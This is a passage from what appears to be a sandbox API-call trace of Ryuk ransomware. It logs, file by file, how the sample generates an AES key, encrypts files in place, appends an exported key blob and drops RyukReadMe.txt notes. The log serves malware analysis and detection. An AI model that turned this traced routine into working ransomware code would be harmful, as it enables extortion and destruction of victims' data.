lpNumberOfBytesWritten=0x29ab120*=0x5b0, lpOverlapped=0x0) returned 1 [0145.606] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.606] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.606] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.606] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.607] CloseHandle (hObject=0x198) returned 1 [0145.624] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.628] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.628] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.629] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.629] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.629] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", dwFileAttributes=0x80) returned 1 [0145.629] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.629] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1635) returned 1 [0145.629] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1635) returned 1 [0145.629] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x541, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.629] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.638] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.638] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.638] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.638] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.638] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x663, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x663, lpOverlapped=0x0) returned 1 [0145.638] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.638] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x663, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x670) returned 1 [0145.638] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.638] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x670, lpOverlapped=0x0) returned 1 [0145.639] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.639] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.639] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.639] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.639] CloseHandle (hObject=0x198) returned 1 [0145.661] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.666] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.666] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.666] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.666] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.666] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", dwFileAttributes=0x80) returned 1 [0145.670] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.670] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1611) returned 1 [0145.670] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1611) returned 1 [0145.670] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x529, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.670] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.671] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.671] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.671] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.672] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.672] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x64b, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x64b, lpOverlapped=0x0) returned 1 [0145.672] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.672] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x64b, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x650) returned 1 [0145.672] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.672] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x650, lpOverlapped=0x0) returned 1 [0145.672] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.672] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.672] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.673] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.673] CloseHandle (hObject=0x198) returned 1 [0145.690] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.694] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.694] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.694] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.694] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.694] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", dwFileAttributes=0x80) returned 1 [0145.694] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.695] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1612) returned 1 [0145.695] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1612) returned 1 [0145.695] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x52a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.695] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.696] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.696] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.696] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.696] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.696] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x64c, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x64c, lpOverlapped=0x0) returned 1 [0145.696] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.696] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x64c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x650) returned 1 [0145.696] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.696] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x650, lpOverlapped=0x0) returned 1 [0145.697] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.697] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.697] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.697] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.697] CloseHandle (hObject=0x198) returned 1 [0145.715] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.719] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.719] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.720] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.720] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.720] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76", dwFileAttributes=0x80) returned 1 [0145.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.720] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=550) returned 1 [0145.720] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=550) returned 1 [0145.720] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x104, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.720] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.721] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.721] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.721] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.721] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.721] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x226, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x226, lpOverlapped=0x0) returned 1 [0145.721] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.721] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x226, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x230) returned 1 [0145.721] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.722] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x230, lpOverlapped=0x0) returned 1 [0145.722] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.722] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.722] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.722] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.722] CloseHandle (hObject=0x198) returned 1 [0145.755] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.760] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.760] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.760] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0145.760] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0145.760] SetLastError (dwErrCode=0x0) [0145.760] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0145.760] GetLastError () returned 0x0 [0145.760] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0145.761] CloseHandle (hObject=0x194) returned 1 [0145.762] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0145.762] SetLastError (dwErrCode=0x0) [0145.762] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0145.762] GetLastError () returned 0xb7 [0145.762] CloseHandle (hObject=0x194) returned 1 [0145.762] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0145.762] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.762] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.762] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.762] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", dwFileAttributes=0x80) returned 1 [0145.763] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.763] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=400) returned 1 [0145.763] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=400) returned 1 [0145.763] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x6e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.763] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.764] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.764] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.764] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.764] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.764] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x190, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0145.764] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.764] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0) returned 1 [0145.764] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.764] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0145.764] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.764] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.764] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.764] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, 